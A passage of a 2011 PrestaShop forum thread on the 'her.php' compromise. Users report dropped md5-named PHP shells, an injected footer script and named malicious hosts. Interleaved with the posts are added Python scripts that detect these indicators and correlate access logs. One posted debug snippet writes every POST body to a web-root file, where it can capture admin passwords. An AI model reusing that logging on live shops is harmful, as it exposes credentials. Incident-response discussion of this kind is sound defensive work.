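from pathlib import Path

# her.php names its dropped files md5(date("r")).".php": 32 lowercase hex chars.
SHELL_NAME = re.compile(r"^[0-9a-f]{32}\.php$")
# her.php inserts " {literal}...{/literal}" directly in front of </body> (heuristic).
FOOTER_INJECT = re.compile(r"\{/literal\}\s*</body>", re.IGNORECASE)
SMARTY_DIRS = ("tools/smarty/compile", "tools/smarty/cache", "tools/smarty_v2")


def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def check_install(root, theme, known_good_footer=None):
    """Return sorted (indicator, relative_path) findings for one shop root.

    known_good_footer: optional path to a trusted copy of footer.tpl
    (backup or SCM checkout); when given, any difference is reported.
    """
    root = Path(root)
    findings = []

    # 5) the dropper itself, if it has not yet deleted itself
    if (root / "modules" / "her.php").is_file():
        findings.append(("dropper_present", "modules/her.php"))

    # 2) hash-named PHP files in /upload and /download
    for folder in ("upload", "download"):
        d = root / folder
        if not d.is_dir():
            continue
        for f in d.iterdir():
            if f.is_file() and SHELL_NAME.match(f.name):
                findings.append(("hash_named_php", f"{folder}/{f.name}"))

    # 3) .htaccess removed from /download (weak on its own, strong with 2)
    if (root / "download").is_dir() and not (root / "download" / ".htaccess").is_file():
        findings.append(("htaccess_missing", "download/.htaccess"))

    # 4) Smarty directories removed
    for rel in SMARTY_DIRS:
        if not (root / rel).is_dir():
            findings.append(("smarty_dir_missing", rel))

    # 1) footer.tpl of the active theme modified
    footer_rel = f"themes/{theme}/footer.tpl"
    footer = root / footer_rel
    if footer.is_file():
        if FOOTER_INJECT.search(footer.read_text(errors="replace")):
            findings.append(("footer_literal_before_body", footer_rel))
        if known_good_footer and sha256(footer) != sha256(known_good_footer):
            findings.append(("footer_differs_from_backup", footer_rel))
    return sorted(findings)


def build_sample_shop(root, compromised):
    """Constructed directory tree for the demo; not a real PrestaShop."""
    root = Path(root)
    for rel in ("modules", "upload", "download", "themes/prestashop") + SMARTY_DIRS:
        (root / rel).mkdir(parents=True, exist_ok=True)
    (root / "download" / ".htaccess").write_text("Deny from all\n")
    footer = root / "themes/prestashop/footer.tpl"
    footer.write_text('<div id="footer"></div>\n</body>\n</html>\n')
    if compromised:
        name = "0123456789abcdef0123456789abcdef.php"  # constructed file name
        (root / "upload" / name).write_text("<?php /* placeholder */ ?>")
        (root / "download" / name).write_text("<?php /* placeholder */ ?>")
        (root / "download" / ".htaccess").unlink()
        (root / "tools/smarty_v2").rmdir()
        footer.write_text('<div id="footer"></div>\n'
                          ' {literal}<!-- placeholder -->{/literal}</body>\n</html>\n')
    return root


def demo():
    """Check one clean and one modified sample tree; return both result lists."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = build_sample_shop(Path(tmp) / "clean", compromised=False)
        bad = build_sample_shop(Path(tmp) / "bad", compromised=True)
        good_footer = clean / "themes/prestashop/footer.tpl"
        return (check_install(clean, "prestashop", good_footer),
                check_install(bad, "prestashop", good_footer))


if __name__ == "__main__":
    clean_findings, bad_findings = demo()
    print("clean:", clean_findings)
    for indicator, path in bad_findings:
        print(f"{indicator:28} {path}")
```

A clean result does not prove the shop was never hit, since her.php deletes itself and the other changes may already have been reverted; the database and back-office credentials still need to be changed as the post says.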
plwm Posted August 24, 2011

> same problem:
> - e66943f1495e1631affdbddae8398209.php file in the download and upload folder
> - script in the footer.tpl

Idem with 1.4.4.0 on local install.
Alaskan Posted August 24, 2011

> same problem:
> - e66943f1495e1631affdbddae8398209.php file in the download and upload folder
> - script in the footer.tpl
>
> Idem with 1.4.4.0 on local install.

Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders. What is the status of this situation? Does PS have a solution? This is very serious.
J D K Posted August 24, 2011

We were affected as well. v1.4.3. Can confirm that smarty_v2 was deleted, there were the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either which was interesting). My install of PS had all the modules so I'm going through and deleting the unused ones.
Slava Posted August 24, 2011

Server log at about 5 min. before and 5 min. after her.php (17:26:00). Hope it is helpful.

Edit: Domain name is changed. Just for security.

log.txt
jesan Posted August 24, 2011

Hi All, I'm new to PrestaShop and just made my shop live. I was just browsing the forum and came across this hack. I checked my files and it seems I have the same problem.

- I deleted the .php files in the upload and download folders
- got rid of the strange code inside the footer.tpl
- it appears my main htaccess file was not altered
- added the htaccess redir as suggested in reddit

I'm considering a new install but, what if I get infected again? Any advice?

tks jesan
ruilong Posted August 24, 2011

Looks like there are a few similar calls made. However, it's 3 hours between.

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"
yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"
titooooom Posted August 24, 2011

I got affected too. So sad =( a lot of lost and resources wasted. =( If need anything to solve this let me know. =)

> Looks like there are a few similar calls made. However, it's 3 hours between.
>
> xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"
> yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"
ruilong Posted August 24, 2011

> I got affected too. So sad =( a lot of lost and resources wasted. =( If need anything to solve this let me know. =)

My guess at this time is that we are dealing with some kind of malware, that has infected your computer, this malware then uses the module upload feature in Prestashop to upload this file. I would suggest the following until a more permanent fix is made.

1. Either remove write permission on modules folder, or uncomment the following code from /admin/tabs/adminModules.php

    function extractArchive($file)
    {
    /*
        global $currentIndex;
        $success = false;
        if (substr($file, -4) == '.zip')
        {
            if (!Tools::ZipExtract($file, _PS_MODULE_DIR_))
                $this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
        }
        else
        {
            $archive = new Archive_Tar($file);
            if ($archive->extract(_PS_MODULE_DIR_))
                $success = true;
            else
                $this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
        }
        @unlink($file);
        if ($success)
            Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token);
    */
    }

2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work.
MikeChoy Posted August 24, 2011

Test upgrading to SVN8151 version and saw the problem. Don't think it's from localhost machine.

Observation:
- her.php file added
- upload dir with additional file
- download dir with additional file
- themes/prestashop/footer.tpl altered
- smarty/cache/* changed
- smarty/compile/* changed
- Categories FO not showing
- 3rd party homecarousel not working anymore
jesusruiz Posted August 24, 2011

My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected. My hosting is Spanish and my shop is only available in Spanish. It is odd that affected stores, and sometimes not. Could it be that the virus appears for a module such as Facebook? Prestashop 1.4.4
Rolo Tomasi Posted August 24, 2011

OK this has just happened to me again. Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK. This morning exactly the same thing has happened again. This needs sorting ASAP.
thehandlestudio Posted August 24, 2011

I have just had my site restored by my host Vidahost. I had tried to replace the tools directory and I still had problems with the log in page as there was a security error coming up in browser. So the only way that would eliminate this was to restore all the files and everything seems back to normal now.

Regards, Mark.
trippodo Posted August 24, 2011

I checked my store files and it seems I have the same problem. I deleted the .php files in the upload and download folder and restored footer.tpl. I have also deleted all files in smarty/cache and smarty/compile. I did not find the file her.php in modules folder.

prestashop 1.4.4.0
Carl Favre Posted August 24, 2011

As Mike said, the whole team is working on this issue. We are trying to fix it as fast as possible. We will keep you informed of any progress. Be assured that we do not take this problem lightly and that we are totally dedicated to fixing it.
dazzza Posted August 24, 2011

Just checked my sites & my clients' sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected. I'm now going to try a clean install on wamp & see what the logs say after.
Raphaël Malié Posted August 24, 2011

Hello, can you search your full apache log for the word "her.php" and copy all found lines here? If you are under linux:

    cat /path/to/your/apache/log | grep "her.php"
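A grep for her.php finds the request itself; pairing each hit with the back-office requests that the same client made just before it shows what preceded the file's appearance, as in the excerpts posted above. This Python script is an added example, not code from the thread or from PrestaShop; the function names, the 30-second window and the sample log lines (constructed, modelled on the excerpts in this thread) are assumptions.

```python
import re
from datetime import datetime

# Apache common or combined log line; the referer field is optional.
LOG_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)

# Constructed sample lines; paths, token and addresses are placeholders.
SAMPLE_LOG = """\
127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST /admindir/ajax.php HTTP/1.1" 200 - "http://localhost/admindir/index.php" "Mozilla/5.0"
127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST /admindir/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/admindir/index.php" "Mozilla/5.0"
127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /admindir/index.php?tab=AdminModules&token=CONSTRUCTED HTTP/1.1" 200 301411 "http://localhost/admindir/index.php" "Mozilla/5.0"
127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /modules/her.php HTTP/1.1" 200 - "http://localhost/admindir/index.php" "Mozilla/5.0"
192.0.2.10 - - [23/Aug/2011:23:40:00 +0200] "GET /modules/blockcart/ajax.php HTTP/1.1" 200 512
this line is not a log entry and is skipped
192.0.2.10 - - [24/Aug/2011:10:31:57 +0200] "GET /shop/modules/her.php HTTP/1.1" 200 -
"""


def parse(lines):
    """Yield one dict per well-formed log line; skip anything else."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        try:
            entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue
        entry["path"] = entry["url"].split("?", 1)[0]
        yield entry


def correlate(lines, window_seconds=30):
    """For every request to her.php, list the AdminModules POSTs sent by the
    same client in the preceding window_seconds."""
    # Apache writes a line when the response finishes, so entries can be
    # out of order (as in the excerpt above); sort by request time first.
    entries = sorted(parse(lines), key=lambda e: e["time"])
    hits = []
    for hit in entries:
        if not hit["path"].endswith("/her.php"):
            continue
        admin_posts = []
        for prev in entries:
            age = (hit["time"] - prev["time"]).total_seconds()
            if (prev["client"] == hit["client"]
                    and prev["method"] == "POST"
                    and "tab=AdminModules" in prev["url"]
                    and 0 <= age <= window_seconds):
                admin_posts.append((prev["url"], int(age)))
        hits.append({
            "client": hit["client"],
            "time": hit["ts"],
            "url": hit["url"],
            "status": hit["status"],
            "referer": hit["referer"],  # None for common-format lines
            "admin_posts": admin_posts,
        })
    return hits


if __name__ == "__main__":
    for h in correlate(SAMPLE_LOG.splitlines()):
        print(h["time"], h["client"], h["url"], "referer:", h["referer"])
        for url, age in h["admin_posts"]:
            print(f"    {age}s earlier: POST {url}")
        if not h["admin_posts"]:
            print("    no AdminModules POST from this client in the window")
```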
Julien Breux Posted August 24, 2011

Hi all, I run an audit on my customers and partners. I hope that isn't my menu but above all isn't PrestaShop!

Ju'
Ruben86 Posted August 24, 2011

Same problems here! The shop went offline after my smarty_v2 folder content was removed. I can't find her.php. Already any suggestions for a fix?
Raphaël Malié Posted August 24, 2011

Hello, for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it as fast as possible. You can send your logs to Carl.

Regards
dazzza Posted August 24, 2011

Last entry line in Apache log after local install on wamp:

127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 -

Then the her.php has gone but footer.tpl has been modified. PrestaShop 1.4.4

BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11
PurpleEdge Posted August 24, 2011

> Hello, for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it as fast as possible. You can send your logs to Carl.
>
> Regards

Attached is my log from this morning. I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected. I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected. I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

PurpleEdge.zip
guest* Posted August 24, 2011

I'm using jbx_menu as well... Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

I use the blocktopmenu from JBX too. No hack at all. BUT I run on an IIS (no Apache) which has no .htaccess so the script will not work. I too use a module called protect.tpl from samhda. It helps to protect your theme if script names are not known...

I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar). I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software.

The security theme is a wide complex theme and it does not mean that file xy was hacked, that this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure... You must make your server secure to be not hacked.
Maxence de Flotte Posted August 24, 2011

> I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

I found it on line 256:

127.0.0.1 - - [24/Aug/2011:09:44:13 +1000] "GET /ozhealth_local/modules/her.php HTTP/1.1" 200 -

Thanks for all these details.

Best regards,
spott Posted August 24, 2011

Hi. One of my customers has the same problem. I restored his site. Right now I don't have server logs to look at when and how the her.php file was added.
MikeChoy Posted August 24, 2011

This is my test finding. Using SVN version_8151 to do a fresh installation (localhost):

- Immediately after installation...access FO ---> no her.php file found
- Then try access to BO by keying in password ---> her.php file was generated
- No other files found in upload and download directory
- Footer.tpl not altered

==continuing with further monitoring & testing

Please find attached access.log for your investigation.

access.txt
dazzza Posted August 24, 2011

Local host site on wamp connects to erabaglanti.ka.hn & the little square at the bottom is an iframe from http://clickmeml.fileave.com
Huot Sébastien Posted August 24, 2011

Same problem here, I found it when the function slidetoggle didn't work anymore.. Lucky me. Any fix or updates?
jLangevin Posted August 24, 2011

Hi, I have 3 stores, 1 has been infected:

- version 1.4.3
- site was in maintenance mode
- new php files in upload and download
- smarty_v2 erased
- footer.tpl altered
- can't find her.php
emilioSH Posted August 24, 2011

sorry
Raphaël Malié Posted August 24, 2011

Hello, for those who can reproduce this bug in localhost, can you please redo an install, and before you do any action on your prestashop please add the following code:

    if ($_POST)
    {
        $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
        fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
        fclose($fd);
    }

below the code function __construct() { in file admin/tabs/adminModules.php.

Once you have noticed the presence of her.php infection, please send me per PM the log file her_log.txt in your Prestashop root folder, thank you
ElRapazGrande Posted August 24, 2011

I have the problem too on a 1.4.4 Prestashop. Found it yesterday at about 6pm Paris time. I removed my active theme directory by FTP, I uploaded a clean one, it worked again, but this morning it was infected again.
Klixin Posted August 24, 2011

I got hacked too, website comes up with error 500. I deleted the sus files as mentioned but I still get error 500. How do I fix to get my client back online?

error log:

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33
Vincent Schoener Posted August 24, 2011

I'm curious for those infected what operating system you use? But as Raphael said, it's coming after the call of AdminModule. We keep you informed about any news.

Best regards
Maxence de Flotte Posted August 24, 2011

> I got hacked too, website comes up with error 500. I deleted the sus files as mentioned but I still get error 500. How do I fix to get my client back online?
>
> error log:
>
> [24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

Hi, Try to re-upload your prestashop. And check:

- /tools/smarty_v2/ exists
- /modules/her.php does NOT exist

Best regards,
thehandlestudio Posted August 24, 2011

> I'm curious for those infected what operating system you use? But as Raphael said, it's coming after the call of AdminModule. We keep you informed about any news.
>
> Best regards

Hi Vincent, I am using a linux operating system if that helps.

Regards, Mark.
jLangevin Posted August 24, 2011

> I'm curious for those infected what operating system you use ?

I'm working on OSX 10.5.8 and for hosting this is Linux

Apache/2.2.14 (Unix)
PHP: 5.2.5
MySQL: 5.1.44

Thanks

Raphaël Malié Posted August 24, 2011

Hello,

for those who can reproduce this bug in localhost, can you please redo an install, and before you do any action on your prestashop please add the following code:

    // Append every POST body and the request environment to a log file
    if ($_POST)
    {
        $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
        fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
        fclose($fd);
    }

below the code function __construct() { in file admin/tabs/adminModules.php.

Once you have noticed the presence of her.php infection, please send me by PM the log file her_log.txt in your Prestashop root folder, thank you

Johann Posted August 24, 2011

Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office...

One of the infected sites has absolutely no additional modules (it's a test site).

Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla.

Raphaël Malié Posted August 24, 2011

For those who can reproduce this bug at localhost, if you can provide us an access ssh to your server BEFORE just after a new install, this would be a great help. You can send it to me per PM.

Regards

philee Posted August 24, 2011

Windows 7 OS. Prestashop 1.4.4

My site was fine at 6:00pm 8/23 then at 7:58 pm 5/23 I noticed my site isn't functioning properly. I sent a ticket to my host and this was found.

Removed:

/home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/dd58e9270114ad1f95c0e3da514a2b6c.php: PHP.Hide.UNOFFICIAL FOUND
/home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/7e30804b68501ac775c35e1db21b502f.php: PHP.Hide.UNOFFICIAL FOUND
/home/sfbm/public_html/webstore/download/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND
/home/sfbm/public_html/webstore/upload/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND

The attacker was able to access my account by using your store's admin interface.

/usr/local/apache/domlogs/sfbm/-----.com: IP ADDRESS - - [23/Aug/2011:19:18:12 -0500] "POST /webstore/admin/ajax.php HTTP/1.1" 200 20 "http://-----.com/webstore/admin/index.php?tab=AdminTools&token=a14d47e372b19cd728aace" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/IP ADDRESS Safari/ADDRESS"

Now my whole ajax categories and cart is messed up. Site doesn't function the same anymore. Detected when I was browsing my store.

UPDATE: 8/24 3:32 AM

feltu Posted August 24, 2011

Guys i'm one of the people been hacked here is what i found:

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /cms.php?id_cms=1 HTTP/1.1" 503 1220 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"
92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /themes/xx/css/maintenance.css HTTP/1.1" 200 623 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"
92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/admin/tab-tools.gif HTTP/1.1" 200 351 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"
92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/logo.jpg HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"
92.200.123.234 - - [24/Aug/2011:05:28:45 -0400] "GET /img/favicon.ico HTTP/1.1" 200 1148 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"
92.200.123.234 - - [24/Aug/2011:05:28:51 -0400] "GET /product.php?id_product=xx HTTP/1.1" 503 1189 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

the ip address i lookup and found this:

[RIPE whois output]

chemapresta Posted August 24, 2011

> Local host site on wamp connects to erabaglanti.ka.hn & the little square at the bottom is an iframe

Hi,

Me too !! PS 1.4.1.0

Pieter Posted August 24, 2011

> Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected. I'm now going to try a clean install on wamp & see what the logs say after.

Hi

Infected as well, had to put the shop offline. I'm on 1.4.2.5

can we have a progress report from the presta team?

regards Pieter

Kamel Boukhateb Posted August 24, 2011

> Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :
>
>     if ($_POST)
>     {
>         $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
>         fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
>         fclose($fd);
>     }
>
> bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you

Can you please read the quote. If someone can do all this, it would grant us great help.

armadillo Posted August 24, 2011

Hi, our website was also hacked. Now I have had to stop access to the website, can anybody say the clear solution?

indus Posted August 24, 2011

> For anyone who finds a her.php file under their modules directory, you should do the following:
>
> - Check the file creation time, write this down and delete the file from your server.
> - Go to your apache raw access logs. You should be able to access it using hosting control panel.
> - Find the line that corresponds to the file creation time you wrote down earlier.
> - Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here. This data would help identify the root of the problem.
>
> To see if you have been attacked, check the following:
>
> - Is there any php file under your uploads or downloads directory apart from index.php?
> - Is there a strange javascript at the end of your footer.tpl file?
>
> If any of the above happens, change your mysql username and password.

I could not find the her.php file, but my footer.tpl surely had the strange javascript at the bottom, with some weird file in upload and download directories.

Site is still up though, but the add to cart buttons didn't work properly and I got a security cert warning from ssl pages showing a weird ssl certificate which was not mine. All slideshows have stopped working. Cannot order products because add to cart does not work anymore.

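The checks from the checklist above, plus the artefacts other posters in this thread report (the md5-named files, the deleted tools/smarty_v2 folder, and the download/.htaccess that the dropper in the first post unlinks), as a read-only scanner. This is an added example, not code from any poster or from PrestaShop; `scan_shop` and its finding labels are hypothetical names, and the footer test is a heuristic that also flags a legitimate script placed directly before `</body>`.

```python
import re
import sys
from pathlib import Path

# The dropper quoted in the first post names its shells md5(date("r")).".php".
MD5_PHP = re.compile(r"^[0-9a-f]{32}\.php$")


def footer_has_trailing_script(text):
    """True when a <script> or {literal} block ends directly before </body>.

    The dropper rewrites "</body>" to " {literal}...{/literal}</body>", so the
    injected block is always the last thing before the closing tag.
    """
    idx = text.lower().rfind("</body>")
    if idx == -1:
        return False
    tail = text[:idx].rstrip().lower()
    return tail.endswith("</script>") or tail.endswith("{/literal}")


def scan_shop(root):
    """Return a list of (kind, relative_path) findings; nothing is modified."""
    root = Path(root)
    findings = []

    if (root / "modules" / "her.php").is_file():
        findings.append(("dropper", "modules/her.php"))

    # Any PHP file in upload/ or download/ apart from index.php is suspect.
    for name in ("upload", "download"):
        folder = root / name
        if not folder.is_dir():
            continue
        for entry in sorted(folder.iterdir()):
            if (entry.is_file() and entry.suffix.lower() == ".php"
                    and entry.name != "index.php"):
                kind = "shell-md5-name" if MD5_PHP.match(entry.name) else "unexpected-php"
                findings.append((kind, f"{name}/{entry.name}"))

    # Assumption: the install shipped download/.htaccess (the dropper unlinks it).
    if (root / "download").is_dir() and not (root / "download" / ".htaccess").exists():
        findings.append(("htaccess-removed", "download/.htaccess"))

    # The dropper deletes tools/smarty_v2, which is what produces the error 500.
    if (root / "tools").is_dir() and not (root / "tools" / "smarty_v2").is_dir():
        findings.append(("smarty-deleted", "tools/smarty_v2"))

    for footer in sorted(root.glob("themes/*/footer.tpl")):
        if footer_has_trailing_script(footer.read_text(errors="replace")):
            findings.append(("footer-script", footer.relative_to(root).as_posix()))

    return findings


if __name__ == "__main__":
    shop_root = sys.argv[1] if len(sys.argv) > 1 else "."
    results = scan_shop(shop_root)
    for kind, path in results:
        print(f"{kind:18} {path}")
    sys.exit(1 if results else 0)
```

Note the modification time of each reported file before deleting it, since that timestamp is what the access-log search in the checklist is keyed on.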
istox Posted August 24, 2011

Same php files in /download and /upload folder. Footer.tpl in theme folder changed. her.php in module folder not exist. Prestashop 1.4.3

SwiftEssentials Posted August 24, 2011

I also got infected by js.Rediretor-IY Tjn yesterday. I'm running 1.4.4 shop but did not find the her.php file. I ran my page source and found this at the bottom....

[obfuscated <script> block, present twice, directly before </body>]

my footer.tpl had the code in it. Also I had the strange files in upload and download which i've deleted and renamed the directories. I'm hoping that works. Is there any way to stop this from happening again?

neller Posted August 24, 2011

> Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :
>
>     if ($_POST)
>     {
>         $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
>         fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
>         fclose($fd);
>     }
>
> bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you

Reading all posts here, it seems the upload / download files and code in footer.tpl are being added when a password is keyed into the admin login on screen.

I have an uninfected shop, footer.tpl is as it should be and upload / download only have index.php. Using this shop, I added the code above to the file, uploaded it, logged out of admin, checked upload / download and footer.tpl, all clean. Relogged in typing the password. WHOA! upload / download have new files, footer.tpl has extra code but no sign of her.php in modules and no log_her.txt in root!

This her.php is being created at a different time than everything else. I will search through the log files and post anything with her.php

Hope this helps.

Neller

spott Posted August 24, 2011

Just in case I made some "protection" to my site. My site was not affected - but one never knows.

I changed the footer.tpl file permissions to 444

Also I made one her.php file in the /modules folder with permissions 400

When attacker can still rewrite these files - then we have some problems with webserver

istox Posted August 24, 2011

I mentioned that I had the same code in footer.tpl like in post #84. download and upload folder renamed, footer.tpl set permissions to 444.

neller Posted August 24, 2011

The only entry for her.php in logs was (url removed);

blah-blah.com my.ip.add.ress - - [24/Aug/2011:11:25:56 +0100] "GET /modules/her.php HTTP/1.1" 200 - "http://blahblah.com/admin/" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"

sYs^ Posted August 24, 2011

One of my stores (1.4.3) got hacked too, funny that the only request to her.php was from my ip address.

indus Posted August 24, 2011

I would like to add: All my slideshows stopped working now. Add to cart button animation doesn't work but product is still added to cart under checkout pages.

Slideshows are third party modules:

- Vtem slideshow from the modules section on forums
- maofree new products slider
- jbx menu 2.7.1

edit: After setting force compile to 'yes' it's working ok now. This exploit surely messed with the cache settings.

aztecmedia Posted August 24, 2011

Hi - I noticed the same issue this morning. First encountered it on the Store Finder page as the Google Map no longer worked. I checked the HTTP requests using Firebug and again noticed about 3 links to external sites (the one I can easily remember is jokelimo.com).

So after reading this thread I discovered the new .php files in the Upload and Download folders and also a change to the footer.tpl file. There was no sign of the her.php as previously mentioned.

So I've deleted the new .php files that were created and copied over my original footer.tpl file. In the hope of preventing anything more damaging from happening I've changed all FTP, database and employee passwords. I've also changed the permissions on the Upload and Download folders to read-only until a fix is released.

From what we can gather it seems as though scripts have been uploaded to the Upload or Download folder which then generate the her.php file. This file must make changes to footer.tpl and then self-delete. Just a guess anyway as not as technically knowledgeable as others on here.

Any updates on what the original cause may have been and when a fix might become available? I don't think upgrading to a new version would be an option as I've made a lot of changes to some of the core files. A much better fix would be if the root problem can be identified and we only have to replace 1 or 2 files.

If this helps, this is the setup information:

Prestashop Version: 1.4.2.5
Server information: Linux #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64
Server software Version: Apache/2.2.3 (CentOS)

Anyway, I hope this gets resolved soon. Thank you all for your helpful comments.

Oliver

istox Posted August 24, 2011

Maybe someone has complex protective actions for what to do before an update is done? Or the problem is resolved. I will search Russian forums for it.

jesusruiz Posted August 24, 2011

One question, the stores are alive and have not been affected. What precaution should be taken? That is, what to do? Changes to permissions on some files or directories? Erase a file in the store so the hack cannot be effective (index.php index.tpl footer.tpl etc ...)?

Thanks.

